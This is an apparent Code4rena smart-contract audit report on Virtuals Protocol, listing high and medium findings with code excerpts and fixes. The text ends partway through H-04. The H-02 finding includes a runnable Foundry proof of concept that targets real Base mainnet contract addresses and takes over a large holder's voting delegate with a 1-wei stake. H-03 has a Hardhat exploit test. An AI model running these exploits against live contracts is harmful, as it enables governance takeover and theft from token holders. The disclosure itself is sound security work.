Virtuals Protocol
Findings & Analysis Report
2025-08-04
Table of contents
- Summary
- Scope
- Severity Criteria
-
- [H-01] Lack of access control in
AgentNftV2::addValidator()enables unauthorized validator injection and causes reward accounting inconsistencies - [H-02] Anybody can control a user’s delegate by calling
AgentVeToken.stake()with 1 wei - [H-03] Public
ServiceNft::updateImpactcall leads to cascading issue - [H-04] Public
ContributionNft::mintleads to cascading issues / loss of funds - [H-05]
ValidatorRegistry::validatorScore/getPastValidatorScoreallows validator to earn full rewards without actually engaging with the protocol - [H-06] Missing
prevAgentIdupdate inpromptMulti()function may cause token loss by transferring toaddress(0)
- [H-01] Lack of access control in
-
- [M-01] Attacker can prevent user from executing application registered through
initFromToken()inAgentFactoryV4. - [M-02] Missing slippage protection on buy and sell
- [M-03] Slippage protection in
AgentTax::dcaSellandBondingTax::swapForAssetis calculated at execution time, effectively retrieving the very same price that the trade will be executing at, ultimately providing no protection - [M-04] Launched tokens are vulnerable to flashloan attacks forcing premature graduation, allowing reward manipulation
- [M-05] Division in
Bonding.sol._openTradingOnUniswap()results in an incorrectlpSupply, highervaultSupply, and dustAgentTokensgetting locked inFPair - [M-06]
BondingTaxhas invalid slippage implementation - [M-07]
amountOutMinpassed in as 0 inAgentToken::_swapTaxleads to loss of funds due to slippage - [M-08] Score in
AgentDAOis not an accurate measure and can be artificially inflated by spamming proposals - [M-09] Functions in FERC20 can’t be invoked
- [M-10] Missing
totalSupplyreduction inburnFromallows supply manipulation (ERC20 Violation) - [M-11]
AgentDAO::_castVotedoesn’t check the array of votes emitted, which determine the number of battles fought inEloCalculator.sol, allowing the user to increase the ELO of a contribution unfairly, inflating the maturity/impact ofServiceNFTs - [M-12] No slippage protection during adding liquidity to uniswap
- [M-13] Removal of a liquidity pool on
AgentToken::removeLiquidityPoolstill incurs taxes on swaps - [M-14]
VotesUpgradeable::delegatebypasses theaddValidatorcall, leads to a non-validator holding voting power along with loss of rewards - [M-15] If
FFactory::buyTaxand / orFFactory::sellTaxis set to 0, buy / sell would revert - [M-16]
Elocalculation error - [M-17]
VirtualGenesisDAO.sol:earlyExecute()proposals can be executed two times - [M-18]
Genesis.sol:onGenesisSuccess()users may lose their unclaimedagentTokensif a second launch occurs before they’ve claimed their rewards from the first - [M-19] Lack of maturity check for non-founder users allowing immediate withdrawals
- [M-20] Delegation not revoked on withdrawal allows reward and voting power inflation post-maturity
- [M-21]
battleElois at risk of underflow revert, which may DOS voting - [M-22] Founder has to double-stake during migration with the initial LP locked in the old
veToken - [M-23] Using
AgentFactory::setAssetTokenwill lead to loss of funds - [M-24] Precision loss in
priceALastandpriceBLast - [M-25] Incorrect mathematical logic
- [M-26] Imprecise calculations in
launchFor()lead to less liquidity be added to the pair via the router
- [M-01] Attacker can prevent user from executing application registered through
-
Low Risk and Non-Critical Issues
- 01 Missing update of
prevAgentIdinpromptMulti - 02 Duplicate import statement for
Math.sol - 03 Invalid
agentIdleads to token burning - 04 Risky one-step admin transfer in
ContributionNft.sol - 05 Fee-induced reserve inconsistency in
FRouter - 06 Duplicate import statement for
AgentFactoryV3.solinFGenesis.sol - 07 Misconception in using
block.timestamp + Xfor swap deadlines - 08 Widespread use of infinite token approvals
- 09 Missing
virtualfunctions for inheritance - 10
totalSupplynot updated on burning inFERC20 - 11 Wrong max transaction limit after burns
- 01 Missing update of
- Disclosures
Overview
About C4
Code4rena (C4) is a competitive audit platform where security researchers, referred to as Wardens, review, audit, and analyze codebases for security vulnerabilities in exchange for bounties provided by sponsoring projects.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Virtuals Protocol smart contract system. The audit took place from April 17 to May 07, 2025.
Final report assembled by Code4rena.
Summary
The C4 analysis yielded an aggregated total of 32 unique vulnerabilities. Of these vulnerabilities, 6 received a risk rating in the category of HIGH severity and 26 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 38 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding, which may include relevant context from the judge and Virtuals Protocol team.
Scope
The code under review can be found within the C4 Virtuals Protocol repository, and is composed of 43 smart contracts written in the Solidity programming language and includes 5,238 lines of Solidity code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
High Risk Findings (6)
[H-01] Lack of access control in AgentNftV2::addValidator() enables unauthorized validator injection and causes reward accounting inconsistencies
Submitted by joicygiore, also found by Astroboy, BRONZEDISC, classic-k, CoheeYang, Damboy, DanielTan_MetaTrust, danzero, debo, gmh5225, gregom, hail_the_lord, hecker_trieu_tien, hirosyama, holtzzx, io10, levi_104, Olugbenga, PotEater, shui, and testnate
The AgentNftV2::addValidator() function lacks any form of access control. While the mint() function of AgentNftV2 does enforce role-based restrictions (MINTER_ROLE), a malicious actor can exploit the AgentFactoryV2::executeApplication() logic to predict and obtain the next virtualId through a call to IAgentNft(nft).nextVirtualId().
By doing so, an attacker can preemptively call addValidator() and append a validator to _validators[virtualId]. Later, when AgentNftV2::mint() is called, it invokes _addValidator() again, causing the validator to be added a second time. This results in a duplicate validator entry for the same virtual ID.
// AgentNftV2::mint()
function mint(
uint256 virtualId,
address to,
string memory newTokenURI,
address payable theDAO,
address founder,
uint8[] memory coreTypes,
address pool,
address token
) external onlyRole(MINTER_ROLE) returns (uint256) {
require(virtualId == _nextVirtualId, "Invalid virtualId");
_nextVirtualId++;
_mint(to, virtualId);
_setTokenURI(virtualId, newTokenURI);
VirtualInfo storage info = virtualInfos[virtualId];
info.dao = theDAO;
info.coreTypes = coreTypes;
info.founder = founder;
IERC5805 daoToken = GovernorVotes(theDAO).token();
info.token = token;
VirtualLP storage lp = virtualLPs[virtualId];
lp.pool = pool;
lp.veToken = address(daoToken);
_stakingTokenToVirtualId[address(daoToken)] = virtualId;
@> _addValidator(virtualId, founder);
@> _initValidatorScore(virtualId, founder);
return virtualId;
}
// AgentNftV2::addValidator()
// Expected to be called by `AgentVeToken::stake()` function
function addValidator(uint256 virtualId, address validator) public {
if (isValidator(virtualId, validator)) {
return;
}
_addValidator(virtualId, validator);
_initValidatorScore(virtualId, validator);
}
// ValidatorRegistry::_addValidator()
function _addValidator(uint256 virtualId, address validator) internal {
_validatorsMap[virtualId][validator] = true;
@> _validators[virtualId].push(validator);
emit NewValidator(virtualId, validator);
} // AgentFactoryV2::executeApplication()
function executeApplication(uint256 id, bool canStake) public noReentrant {
// This will bootstrap an Agent with following components:
// C1: Agent Token
// C2: LP Pool + Initial liquidity
// C3: Agent veToken
// C4: Agent DAO
// C5: Agent NFT
// C6: TBA
// C7: Stake liquidity token to get veToken
// SNIP...
// C5
@> uint256 virtualId = IAgentNft(nft).nextVirtualId();
@> IAgentNft(nft).mint(
virtualId,
_vault,
application.tokenURI,
dao,
application.proposer,
application.cores,
lp,
token
);
application.virtualId = virtualId;
// SNIP...
}The reward mechanism in AgentRewardV2 relies on iterating over validator lists to compute and distribute rewards. If a validator is duplicated due to the aforementioned issue, the reward distribution logic - particularly in _distributeValidatorRewards() — recalculates and overwrites the validator’s rewards.
This does not break reward allocation for individual validators due to overwriting. However, the shared variable validatorPoolRewards accumulates validator-level residuals multiple times due to the duplicated validator entries. As a result, validatorPoolRewards can become overstated relative to the actual token amount deposited.
When withdrawValidatorPoolRewards() is eventually called, it transfers this erroneously accumulated excess amount to the designated address. This reduces the contract’s balance below what is required to cover valid validator rewards, ultimately resulting in reward claim failures unless someone manually tops up the shortfall.
// AgentRewardV2::distributeRewards()
function distributeRewards(uint256 amount) public onlyGov returns (uint32) {
require(amount > 0, "Invalid amount");
@> IERC20(rewardToken).safeTransferFrom(_msgSender(), address(this), amount);
RewardSettingsCheckpoints.RewardSettings memory settings = getRewardSettings();
uint256 protocolShares = _distributeProtocolRewards(amount);
uint256 agentShares = amount - protocolShares;
_prepareAgentsRewards(agentShares, settings);
return SafeCast.toUint32(_mainRewards.length - 1);
}
// AgentRewardV2::_distributeValidatorRewards()
function _distributeValidatorRewards(
uint256 amount,
uint256 virtualId,
uint48 rewardId,
uint256 totalStaked
) private {
IAgentNft nft = IAgentNft(agentNft);
// Calculate weighted validator shares
uint256 validatorCount = nft.validatorCount(virtualId);
uint256 totalProposals = nft.totalProposals(virtualId);
for (uint256 i = 0; i < validatorCount; i++) {
address validator = nft.validatorAt(virtualId, i);
// Get validator revenue by votes weightage
address stakingAddress = getVirtualTokenAddress(nft, virtualId);
uint256 votes = IERC5805(stakingAddress).getVotes(validator);
uint256 validatorRewards = (amount * votes) / totalStaked;
// Calc validator reward based on participation rate
uint256 participationReward = totalProposals == 0
? 0
: (validatorRewards * nft.validatorScore(virtualId, validator)) / totalProposals;
@> _validatorRewards[validator][rewardId] = participationReward;
@> validatorPoolRewards += validatorRewards - participationReward;
}
}
// AgentRewardV2::withdrawValidatorPoolRewards()
function withdrawValidatorPoolRewards(address recipient) external onlyGov {
require(validatorPoolRewards > 0, "No validator pool rewards");
IERC20(rewardToken).safeTransfer(recipient, validatorPoolRewards);
validatorPoolRewards = 0;
}Recommended mitigation steps
Add access control to addValidator():
- function addValidator(uint256 virtualId, address validator) public {
+ function addValidator(uint256 virtualId, address validator) public onlyRole(VALIDATOR_ADMIN_ROLE) {
if (isValidator(virtualId, validator)) {
return;
}
_addValidator(virtualId, validator);
_initValidatorScore(virtualId, validator);
}Virtuals marked as informative
[H-02] Anybody can control a user’s delegate by calling AgentVeToken.stake() with 1 wei
Submitted by BowTiedOriole, also found by 0x1982us, BlackAdam, chupinexx, Egbe, Ishenxx, natachi, and Pelz
AgentVeToken.stake() function will automatically update the delegatee for the receiver. A malicious user can stake 1 wei of the LP token, set the receiver to be a user with an high balance of the veTokens, and set themselves as the delegatee.
function stake(uint256 amount, address receiver, address delegatee) public {
require(canStake || totalSupply() == 0, "Staking is disabled for private agent"); // Either public or first staker
address sender = _msgSender();
require(amount > 0, "Cannot stake 0");
require(IERC20(assetToken).balanceOf(sender) >= amount, "Insufficient asset token balance");
require(IERC20(assetToken).allowance(sender, address(this)) >= amount, "Insufficient asset token allowance");
IAgentNft registry = IAgentNft(agentNft);
uint256 virtualId = registry.stakingTokenToVirtualId(address(this));
require(!registry.isBlacklisted(virtualId), "Agent Blacklisted");
if (totalSupply() == 0) {
initialLock = amount;
}
registry.addValidator(virtualId, delegatee);
IERC20(assetToken).safeTransferFrom(sender, address(this), amount);
_mint(receiver, amount);
_delegate(receiver, delegatee); // @audit-high Anybody can change delegate if they stake 1 wei LP
_balanceCheckpoints[receiver].push(clock(), SafeCast.toUint208(balanceOf(receiver)));
}Since these are the tokens that are used as voting power in the AgentDAO, a malicious user can donate 1 wei to multiple users with high balances, receive a majority voting power, then submit a malicious proposal.
Recommended mitigation steps
Either remove the automatic call to _delegate or only do the call if sender == receiver.
Proof of Concept
Create a new foundry project, set BASE_RPC_URL, and run.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console} from "forge-std/Test.sol";
interface IERC20 {
function transfer(address to, uint256 amount) external returns (bool);
function mint(address to, uint256 amount) external;
function approve(address spender, uint256 amount) external returns (bool);
function balanceOf(address account) external view returns (uint256);
}
interface IAgentToken is IERC20 {
function distributeTaxTokens() external;
function projectTaxPendingSwap() external view returns (uint256);
function projectTaxRecipient() external view returns (address);
function setProjectTaxRecipient(address projectTaxRecipient_) external;
function setSwapThresholdBasisPoints(uint16 swapThresholdBasisPoints_) external;
function setProjectTaxRates(
uint16 newProjectBuyTaxBasisPoints_,
uint16 newProjectSellTaxBasisPoints_
) external;
}
interface IVeToken {
function stake(uint256 amount, address receiver, address delegatee) external;
function delegates(address account) external view returns (address);
}
interface IUniswapV2Router {
function swapExactTokensForTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external returns (uint[] memory amounts);
function addLiquidity(
address tokenA,
address tokenB,
uint amountADesired,
uint amountBDesired,
uint amountAMin,
uint amountBMin,
address to,
uint deadline
) external returns (uint amountA, uint amountB, uint liquidity);
}
contract StakeDelegatePOC is Test {
IAgentToken agentToken = IAgentToken(0x1C4CcA7C5DB003824208aDDA61Bd749e55F463a3);
address agentPair = 0xD418dfE7670c21F682E041F34250c114DB5D7789;
IERC20 virtualToken = IERC20(0x0b3e328455c4059EEb9e3f84b5543F74E24e7E1b);
address bridge = 0x4200000000000000000000000000000000000010;
IUniswapV2Router router = IUniswapV2Router(0x4752ba5DBc23f44D87826276BF6Fd6b1C372aD24);
string BASE_RPC_URL = vm.envString("BASE_RPC_URL");
address user = makeAddr("user");
uint256 virtualAmount = 2000 ether;
function setUp() public {
uint256 forkId = vm.createFork(BASE_RPC_URL, 29_225_700);
vm.selectFork(forkId);
// Set up the user with virtual tokens
vm.prank(bridge);
virtualToken.mint(user, virtualAmount);
}
function test_malicious_stake_delegate_poc() public {
vm.startPrank(user);
virtualToken.approve(address(router), type(uint256).max);
agentToken.approve(address(router), type(uint256).max);
// Swap half of the virtual tokens to agent tokens
address[] memory path = new address[](2);
path[0] = address(virtualToken);
path[1] = address(agentToken);
router.swapExactTokensForTokens(virtualAmount / 2, 0, path, user, block.timestamp);
// Add liquidity to the pool to get LP tokens
router.addLiquidity(
address(virtualToken),
address(agentToken),
virtualAmount / 2,
agentToken.balanceOf(user),
1,
1,
user,
block.timestamp
);
address gameDeployer = 0xD38493119859b8806ff28C32c41fdd67Ef41b8Ef; // Main holder of veTokens
IVeToken veToken = IVeToken(0x974a21754271dD3d71a16F2852F8e226a9276b3E);
assertNotEq(veToken.delegates(gameDeployer), user);
// Stake 1 wei of LP for gameDeployer to update delegate
IERC20(agentPair).approve(address(veToken), 1);
veToken.stake(1, gameDeployer, user);
assertEq(veToken.delegates(gameDeployer), user);
}
}Virtuals marked as informative
[H-03] Public ServiceNft::updateImpact call leads to cascading issue
Submitted by YouCrossTheLineAlfie, also found by Astroboy, debo, EPSec, gmh5225, gregom, hecker_trieu_tien, Heyu, holtzzx, LeoGold, levi_104, maxzuvex, oakcobalt, Pelz, PotEater, Rorschach, shui, soloking, and TheDonH
The ServiceNft::mint is designed to be called via governance:
Contribution Process: Contributors submit their proposals through our frontend, utilizing the modular consensus framework. Each proposal generates a contribution NFT regardless of acceptance, authenticating the submission's origin.
State Finality in ICV: Accepted contributions are minted as service NFTs on-chain and assigned to the appropriate Virtual address within the ICV, validating their integration into the Virtual ecosystem.This function calls the ServiceNft::updateImpact which sets up the impacts using the datasetImpactWeight variable:
function updateImpact(uint256 virtualId, uint256 proposalId) public {
// . . . Rest of the code . . .
if (datasetId > 0) {
_impacts[datasetId] = (rawImpact * datasetImpactWeight) / 10000; <<@ -- // datasetImpactWeight is used
_impacts[proposalId] = rawImpact - _impacts[datasetId]; <<@ -- // Affects both `proposalId` and `datasetId`
emit SetServiceScore(datasetId, _maturities[proposalId], _impacts[datasetId]);
_maturities[datasetId] = _maturities[proposalId];
}
// . . . Rest of the code . . .
}However, as we can see the ServiceNft::updateImpact’s visibility modifier is public, allowing anyone to call it with any virtualId/proposalId. So if the admin decides to call the ServiceNft::setDatasetImpactWeight, there would be a cascading issue where users would simply update the impact accordingly to their own favour.
There are financial incentives observed as well, described as follows:
- The
AgentRewardV2::_distributeContributorRewardsusesServiceNft::getImpactcall for calculating rewards; hence, allowing to gain higher rewards or provide lesser rewards to the rest.
function _distributeContributorRewards(
uint256 amount,
uint256 virtualId,
RewardSettingsCheckpoints.RewardSettings memory settings
) private {
// . . . Rest of the code . . .
for (uint i = 0; i < services.length; i++) {
serviceId = services[i];
impact = serviceNftContract.getImpact(serviceId); <<@ -- // Uses getImpact
if (impact == 0) {
continue;
}
ServiceReward storage serviceReward = _serviceRewards[serviceId];
if (serviceReward.impact == 0) {
serviceReward.impact = impact;
}
_rewardImpacts[reward.id][serviceNftContract.getCore(serviceId)] += impact;
}
// . . . Rest of the code . . .
}- The
Minter::mintuses theServiceNft::getImpactcall to transfer tokens; hence, leading to excess or lower funds being transferred.
function mint(uint256 nftId) public noReentrant {
// . . . Rest of the code . . .
uint256 finalImpactMultiplier = _getImpactMultiplier(virtualId);
uint256 datasetId = contribution.getDatasetId(nftId);
uint256 impact = IServiceNft(serviceNft).getImpact(nftId); <<@ -- // Uses getImpact
if (impact > maxImpact) {
impact = maxImpact;
}
uint256 amount = (impact * finalImpactMultiplier * 10 ** 18) / DENOM;
uint256 dataAmount = datasetId > 0
? (IServiceNft(serviceNft).getImpact(datasetId) * finalImpactMultiplier * 10 ** 18) / DENOM
: 0;
// . . . Rest of the code . . .
}Impact
- Public
ServiceNft::updateImpactfunction allows changing impacts to anyone. -
Cascading issue leads loss of funds via:
- Higher / Lower rewards according to the
datasetImpactWeightincrease or decrease. - Higher / Lower mints as per the
datasetImpactWeightchange.
- Higher / Lower rewards according to the
Recommended mitigation steps
It is highly contextual as per what the protocol intends to do, it is suggested to not keep updateImpact as a public function as it would be unfair for other users:
- function updateImpact(uint256 virtualId, uint256 proposalId) public {
+ function updateImpact(uint256 virtualId, uint256 proposalId) internal {Proof of Concept
The test case below was ran using a base mainnet fork, please add the same to the hardhat.config.js file.
The hardhat version wasn’t supporting the base mainnet fork, so it had to be upgraded:
"hardhat": "^2.23.0",Add the following values to the .env file (along with private keys:
### Genesis DAO settings
GENESIS_VOTING_DELAY=0
GENESIS_VOTING_PERIOD=900
GENESIS_PROPOSAL_THRESHOLD=0
### Virtual DAO settings
PROTOCOL_VOTING_DELAY=0
PROTOCOL_VOTING_PERIOD=900
PROTOCOL_PROPOSAL_THRESHOLD=1000000000000000000000000
PROTOCOL_QUORUM_NUMERATOR=1000
### Other settings
CHAIN_ID=84532
VIRTUAL_APPLICATION_THRESHOLD=50000000000000000000 # 50
VIRTUAL_APPLICATION_THRESHOLD_VIP=125000000000000000000 #125 $V
MATURITY_DURATION=1000 # number of blocks until initial virtual staker can withdraw (1000 blocks = ~33 minutes)
### AgentToken settings
AGENT_TOKEN_SUPPLY=1000000000 # 1B supply
AGENT_TOKEN_LIMIT_TRX=100000 # 100k max token per txn
AGENT_TOKEN_LIMIT_WALLET=1000000 # 1M token per wallet
AGENT_TOKEN_LP_SUPPLY=1000000000 # 1B LP tokens
AGENT_TOKEN_LIMIT=1000000000
AGENT_TOKEN_VAULT_SUPPLY=0 #
BOT_PROTECTION=3600 # 1hr
TAX=100 # 3%
BONDING_TAX=1
SWAP_THRESHOLD=1 # 0.00001% of total supply
### VOTING_TOKEN=
TBA_REGISTRY=
### Reward settings
PARENT_SHARES=2000 # 20%
PROTOCOL_SHARES=1000 # 10%
CONTRIBUTOR_SHARES=5000 # 50%
STAKER_SHARES=9000 # 90%
REWARD_STAKE_THRESHOLD=2000000000000000000 # 2 eth
DATASET_SHARES=7000 # 70%
### TAX MANAGER
MIN_SWAP_THRESHOLD=100000000000000000 # 0.1
MAX_SWAP_THRESHOLD=1000000000000000000000 # 1000
UNISWAP_ROUTER=0x4752ba5dbc23f44d87826276bf6fd6b1c372ad24Create a file called PoC.js anad add the following test case inside the /tests folder and run npx hardhat test --grep "Unfair updateImpact":
const { parseEther, toBeHex, formatEther } = require("ethers/utils");
const { expect } = require("chai");
const {
loadFixture,
mine,
impersonateAccount,
setBalance,
} = require("@nomicfoundation/hardhat-toolbox/network-helpers");
const { ethers } = require("hardhat");
describe("AgentFactory", () => {
const PROPOSAL_THRESHOLD = parseEther("50000"); // 50k
const MATURITY_SCORE = toBeHex(2000, 32); // 20%
const IP_SHARE = 1000; // 10%
const genesisInput = {
name: "Jessica",
symbol: "JSC",
tokenURI: "http://jessica",
daoName: "Jessica DAO",
cores: [0, 1, 2],
tbaSalt:
"0xa7647ac9429fdce477ebd9a95510385b756c757c26149e740abbab0ad1be2f16",
tbaImplementation: process.env.TBA_IMPLEMENTATION || ethers.ZeroAddress,
daoVotingPeriod: 600,
daoThreshold: 1000000000000000000000n,
};
const getAccounts = async () => {
const [deployer, ipVault, founder, poorMan, trader, treasury, randomAddr] = await ethers.getSigners();
// Fund all accounts with ETH for gas (10 ETH each)
const fundAccounts = [deployer, ipVault, founder, poorMan, trader, treasury];
for (const account of fundAccounts) {
await setBalance(account.address, parseEther("10"));
}
return { deployer, ipVault, founder, poorMan, trader, treasury, randomAddr };
};
async function deployBaseContracts() {
const { deployer, ipVault, treasury } = await getAccounts();
// Setting up environment variables if not present in the actual .env
// This is for testing purposes only
if (!process.env.TBA_IMPLEMENTATION) process.env.TBA_IMPLEMENTATION = ethers.ZeroAddress;
if (!process.env.DATASET_SHARES) process.env.DATASET_SHARES = "1000"; // 10%
if (!process.env.UNISWAP_ROUTER) process.env.UNISWAP_ROUTER = "0x8aEF2b5C33686F8621A17B9Aaff079E7d8D673f9"; // Base mainnet Uniswap router
if (!process.env.AGENT_TOKEN_LIMIT) process.env.AGENT_TOKEN_LIMIT = parseEther("10000000").toString(); // 10M
if (!process.env.AGENT_TOKEN_LP_SUPPLY) process.env.AGENT_TOKEN_LP_SUPPLY = parseEther("5000000").toString(); // 5M
if (!process.env.AGENT_TOKEN_VAULT_SUPPLY) process.env.AGENT_TOKEN_VAULT_SUPPLY = parseEther("2000000").toString(); // 2M
if (!process.env.BOT_PROTECTION) process.env.BOT_PROTECTION = "100"; // 1%
if (!process.env.TAX) process.env.TAX = "500"; // 5%
if (!process.env.SWAP_THRESHOLD) process.env.SWAP_THRESHOLD = parseEther("10").toString(); // 10 tokens
console.log("Deploying VirtualToken...");
const virtualToken = await ethers.deployContract(
"VirtualToken",
[PROPOSAL_THRESHOLD, deployer.address],
{}
);
await virtualToken.waitForDeployment();
console.log(`VirtualToken deployed at ${virtualToken.target}`);
console.log("Deploying ERC6551Registry Registry");
const tbaRegistry = await ethers.deployContract("ERC6551Registry");
await tbaRegistry.waitForDeployment();
console.log("Deployed ERC6551Registry Registry");
console.log("Deploying AgentNftV2...");
const AgentNft = await ethers.getContractFactory("AgentNftV2");
const agentNft = await upgrades.deployProxy(AgentNft, [deployer.address]);
console.log(`AgentNftV2 deployed at ${agentNft.target}`);
console.log("Deploying ContributionNft...");
const contribution = await upgrades.deployProxy(
await ethers.getContractFactory("ContributionNft"),
[agentNft.target],
{}
);
console.log(`ContributionNft deployed at ${contribution.target}`);
console.log("Deploying ServiceNft...");
const service = await upgrades.deployProxy(
await ethers.getContractFactory("ServiceNft"),
[agentNft.target, contribution.target, process.env.DATASET_SHARES],
{}
);
console.log(`ServiceNft deployed at ${service.target}`);
await agentNft.setContributionService(contribution.target, service.target);
console.log("Set contribution and service on AgentNft");
// Implementation contracts
console.log("Deploying AgentToken...");
const agentToken = await ethers.deployContract("AgentToken");
await agentToken.waitForDeployment();
console.log(`AgentToken deployed at ${agentToken.target}`);
console.log("Deploying AgentDAO...");
const agentDAO = await ethers.deployContract("AgentDAO");
await agentDAO.waitForDeployment();
console.log(`AgentDAO deployed at ${agentDAO.target}`);
console.log("Deploying AgentVeToken...");
const agentVeToken = await ethers.deployContract("AgentVeToken");
await agentVeToken.waitForDeployment();
console.log(`AgentVeToken deployed at ${agentVeToken.target}`);
console.log("Deploying AgentFactoryV2...");
const agentFactory = await upgrades.deployProxy(
await ethers.getContractFactory("AgentFactoryV2"),
[
agentToken.target,
agentVeToken.target,
agentDAO.target,
tbaRegistry.target,
virtualToken.target,
agentNft.target,
PROPOSAL_THRESHOLD,
deployer.address,
]
);
await agentFactory.waitForDeployment();
console.log(`AgentFactoryV2 deployed at ${agentFactory.target}`);
await agentNft.grantRole(await agentNft.MINTER_ROLE(), agentFactory.target);
console.log("Granted MINTER_ROLE to AgentFactory");
console.log("Deploying Minter...");
const minter = await upgrades.deployProxy(
await ethers.getContractFactory("Minter"),
[
service.target,
contribution.target,
agentNft.target,
1e12,
20,
ipVault.address,
agentFactory.target,
deployer.address,
1e10,
]
);
await minter.waitForDeployment();
console.log(`Minter deployed at ${minter.target}`);
console.log("Setting parameters on AgentFactory...");
await agentFactory.setMaturityDuration(86400 * 365 * 10); // 10years
await agentFactory.setUniswapRouter(process.env.UNISWAP_ROUTER);
await agentFactory.setTokenAdmin(deployer.address);
await agentFactory.setTokenSupplyParams(
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LP_SUPPLY,
process.env.AGENT_TOKEN_VAULT_SUPPLY,
process.env.AGENT_TOKEN_LIMIT,
process.env.AGENT_TOKEN_LIMIT,
process.env.BOT_PROTECTION,
minter.target
);
await agentFactory.setTokenTaxParams(
process.env.TAX,
process.env.TAX,
process.env.SWAP_THRESHOLD,
treasury.address
);
console.log("AgentFactory parameters set");
return { virtualToken, agentFactory, agentNft, minter, tbaRegistry, service };
}
async function deployWithApplication() {
const base = await deployBaseContracts();
const { agentFactory, virtualToken, tbaRegistry } = base;
const { founder } = await getAccounts();
// Prepare tokens for proposal
console.log("Minting VirtualToken for founder...");
await virtualToken.mint(founder.address, PROPOSAL_THRESHOLD);
await virtualToken
.connect(founder)
.approve(agentFactory.target, PROPOSAL_THRESHOLD);
console.log("Proposing agent...");
const tx = await agentFactory
.connect(founder)
.proposeAgent(
genesisInput.name,
genesisInput.symbol,
genesisInput.tokenURI,
genesisInput.cores,
genesisInput.tbaSalt,
tbaRegistry.target,
genesisInput.daoVotingPeriod,
genesisInput.daoThreshold
);
await tx.wait();
const filter = agentFactory.filters.NewApplication;
const events = await agentFactory.queryFilter(filter, -1);
const event = events[0];
const { id } = event.args;
console.log(`Agent application created with ID: ${id}`);
return { applicationId: id, ...base };
}
async function deployWithAgent() {
const base = await deployWithApplication();
const { agentFactory, applicationId } = base;
const { founder } = await getAccounts();
console.log("Executing application...");
await agentFactory
.connect(founder)
.executeApplication(applicationId, false);
const factoryFilter = agentFactory.filters.NewPersona;
const factoryEvents = await agentFactory.queryFilter(factoryFilter, -1);
const factoryEvent = factoryEvents[0];
const { virtualId, token, veToken, dao, tba, lp } = await factoryEvent.args;
console.log(`Agent created with virtualId: ${virtualId}`);
return {
...base,
agent: {
virtualId,
token,
veToken,
dao,
tba,
lp,
},
};
}
before(async function () {
// Increase timeout for all tests
this.timeout(60000);
});
it("Unfair updateImpact", async function () {
const { agent, agentNft, virtualToken, service} = await loadFixture(
deployWithAgent
);
const { trader, poorMan, founder, randomAddr, deployer } = await getAccounts();
// Update the impact
await service.connect(trader).updateImpact(1n, 1n);
// Old - DATASET_SHARES=7000 # 70%
expect(await service.datasetImpactWeight()).to.be.eq(7000n);
// Change the datasetImpactWeight
// Setting to 8000
await service.connect(deployer).setDatasetImpactWeight(8000n);
expect(await service.datasetImpactWeight()).to.be.eq(8000n);
// Again updating impact should work
await service.connect(trader).updateImpact(1n, 1n);
});
});Virtuals marked as informative
[H-04] Public ContributionNft::mint leads to cascading issues / loss of funds
Submitted by YouCrossTheLineAlfie, also found by axelot, DarkeEEandMe, Legend, mbuba666, RaOne, and sergei2340
The contributors are supposed to submit their proposals via frontend and it is assumed from the docs, that the frontend calls the ContributionNft::mint function to mint as per the proposed proposal.
Contribution Process: Contributors submit their proposals through our frontend, utilizing the modular consensus framework. Each proposal generates a contribution NFT regardless of acceptance, authenticating the submission's origin.However, the ContributionNft::mint is un-gaurded, allowing proposers to mint their own NFTs.
function mint(
address to,
uint256 virtualId,
uint8 coreId,
string memory newTokenURI,
uint256 proposalId,
uint256 parentId,
bool isModel_,
uint256 datasetId
) external returns (uint256) {
IGovernor personaDAO = getAgentDAO(virtualId);
require(
msg.sender == personaDAO.proposalProposer(proposalId),
"Only proposal proposer can mint Contribution NFT"
);
require(parentId != proposalId, "Cannot be parent of itself");An issue arises here when these proposers are able to pass in incorrect/bogus values of incorrect coreId, newTokenURI, parentId, isModel_ and datasetId.
Impact
- Incorrect cores and model values inside the
ServiceNft::mintfunction, leading to incorrectserviceNFTmint:
function mint(uint256 virtualId, bytes32 descHash) public returns (uint256) {
// . . . Rest of the code . . .
uint256 proposalId = personaDAO.hashProposal(targets, values, calldatas, descHash);
_mint(info.tba, proposalId);
_cores[proposalId] = IContributionNft(contributionNft).getCore(proposalId); <<@ -- // Incorrect core set
// Calculate maturity
_maturities[proposalId] = IAgentDAO(info.dao).getMaturity(proposalId);
bool isModel = IContributionNft(contributionNft).isModel(proposalId); <<@ -- // Incorrect model
if (isModel) {
emit CoreServiceUpdated(virtualId, _cores[proposalId], proposalId);
updateImpact(virtualId, proposalId);
_coreServices[virtualId][_cores[proposalId]] = proposalId;
} else {
_coreDatasets[virtualId][_cores[proposalId]].push(proposalId);
}
// . . . Rest of the code . . .
}- Incorrect
datasetIdwould overwrite someone else’s values as well as incorrect_impactscalculated for bothproposalIdanddatasetIdcan be seen inside theServiceNft::updateImpact:
function updateImpact(uint256 virtualId, uint256 proposalId) public {
// . . . Rest of the code . . .
uint256 datasetId = IContributionNft(contributionNft).getDatasetId(proposalId); <<@ -- // Incorrect datasetId
_impacts[proposalId] = rawImpact;
if (datasetId > 0) {
_impacts[datasetId] = (rawImpact * datasetImpactWeight) / 10000; <<@ -- // Incorrect impact calculated
_impacts[proposalId] = rawImpact - _impacts[datasetId]; <<@ -- // Incorrect impact calculated
emit SetServiceScore(datasetId, _maturities[proposalId], _impacts[datasetId]);
_maturities[datasetId] = _maturities[proposalId];
}
// . . . Rest of the code . . .
}This clearly breaks three functionalities:
- The
AgentRewardV2::_distributeContributorRewardsusesServiceNft::getImpactcall for calculating rewards; hence, allowing to gain higher rewards or provide lesser rewards to the rest.
function _distributeContributorRewards(
uint256 amount,
uint256 virtualId,
RewardSettingsCheckpoints.RewardSettings memory settings
) private {
